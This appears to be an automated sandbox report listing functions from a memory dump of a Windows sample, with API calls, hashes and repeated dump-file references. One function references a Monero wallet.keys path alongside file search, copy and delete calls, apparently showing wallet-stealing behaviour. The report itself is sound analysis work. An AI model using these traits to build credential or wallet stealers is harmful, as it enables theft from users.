Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 803c14d409fdafbd1c2465b307c5a203ecb76a9917a875ca55ffbddfcf458ff6
Instruction ID: e3550f6229c04816091266527f3609ba4a224a8d96b098c0eeda0b17d09d75e1
Opcode Fuzzy Hash: 803c14d409fdafbd1c2465b307c5a203ecb76a9917a875ca55ffbddfcf458ff6
Instruction Fuzzy Hash: BF91F1B191010C9BDB18EBA4DC55DFE73B8AF14340F5485A9F60AB7091EF746A0DCBA2

Function 00BEB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

lstrlen.KERNEL32(00000000), ref: 00BEB42E
lstrlen.KERNEL32(00000000), ref: 00BEB442

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: da01452026274db7903cca5100a33449f60666ae9611417cb4d0233a5d5b94cd
Instruction ID: b6a6550b09ae0c35c8c00f6350f829fe50f28b7f069501c4fcee0f293109e3b2
Opcode Fuzzy Hash: da01452026274db7903cca5100a33449f60666ae9611417cb4d0233a5d5b94cd
Instruction Fuzzy Hash: 317101B191010C9BDB18EBA4DC96DFE73B8AF54340F4445A8F60AB7191EF746A0DCB62

Function 00BF4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF4BEA
lstrcat.KERNEL32(?,0173D810), ref: 00BF4C08

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943

Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49B0
Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C008D2), ref: 00BF49C5
Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49E2
Part of subcall function 00BF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BF4A1E
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,0173EB28), ref: 00BF4A4A
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FF8), ref: 00BF4A5C
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A70
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FFC), ref: 00BF4A82
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A96
Part of subcall function 00BF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BF4AAC
Part of subcall function 00BF4910: DeleteFileA.KERNEL32(?), ref: 00BF4B31

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF4A07

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: aefc7d210789a3eef9e54e4b747297bd4ef8e3563fe98d4193c6bee375fcde67
Instruction ID: e392e2a818fe4ee7d1e9c559a4078fe9241d90b6abddafa856a2e256e58a1625
Opcode Fuzzy Hash: aefc7d210789a3eef9e54e4b747297bd4ef8e3563fe98d4193c6bee375fcde67
Instruction Fuzzy Hash: 7F41FDB75002086FC764FBA4EC42EFE33BDA795300F048958B65A67185EE715B8D8BD2

Function 00BE6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00BE6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00BE6753

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 868f50817f2b16157096135e163119168e9e62119e16c27be1ce478cbdba9731
Instruction ID: 5c06ad1902c24711939b900d6762657e6d61954463b7b4ce339a83af6837b09e
Opcode Fuzzy Hash: 868f50817f2b16157096135e163119168e9e62119e16c27be1ce478cbdba9731
Instruction Fuzzy Hash: AB41C674A00209EFCB44CF99C494BADBBB1FF58354F2482A9E9599B345D731EA81CB84

Function 00BF5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF508A
lstrcat.KERNEL32(?,0173E2A0), ref: 00BF50A8

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: d18222f0b9d44cb1aa092803bd0b39453d2b14e094dba47f8ac341ace010cb26
Instruction ID: e00d3997226e23d3de64aa735f3bc3a9b0dc353902688877d111ea2b8f56b53d
Opcode Fuzzy Hash: d18222f0b9d44cb1aa092803bd0b39453d2b14e094dba47f8ac341ace010cb26
Instruction Fuzzy Hash: 300148B690020C5BCB68FB65DC47EFE73BCAB54700F004594B74967191EEB49A8D8BE2

Function 00BE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BE10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BE10F7

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
Instruction ID: 28d3d31b468d16b065a7cba73cd31946878ac51d00f9d3868f1dbb0dc15d8d25
Opcode Fuzzy Hash: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
Instruction Fuzzy Hash: FEF02771641308BBEB149BA9AC49FBFB7ECE705B15F301898F604E3280D6719F04DAA4

Function 00BF8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 437b2783114b5bb7cb74202a7e84176666a1e36e4405c2f631d69a065a3a0f2f
Instruction ID: 5e07acec701468241fabf5beb5fbaf932953a128e1466d56975f8d9545c2a24f
Opcode Fuzzy Hash: 437b2783114b5bb7cb74202a7e84176666a1e36e4405c2f631d69a065a3a0f2f
Instruction Fuzzy Hash: 19F0A574C0020CEBCB14EFA4D5496ECBBB4EF11310F1081E9E966672D0DB745A5ADB81

Function 00BF8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a8d5eb6a9ae23538b15eece6cfe478ca32eb6a3ba1a9dee761cf5540cfa8997
Instruction ID: 6a978b85d8a9e2cdca5061446380ca937e40a6dd139b5f5b7ee4a2e1e88a6176
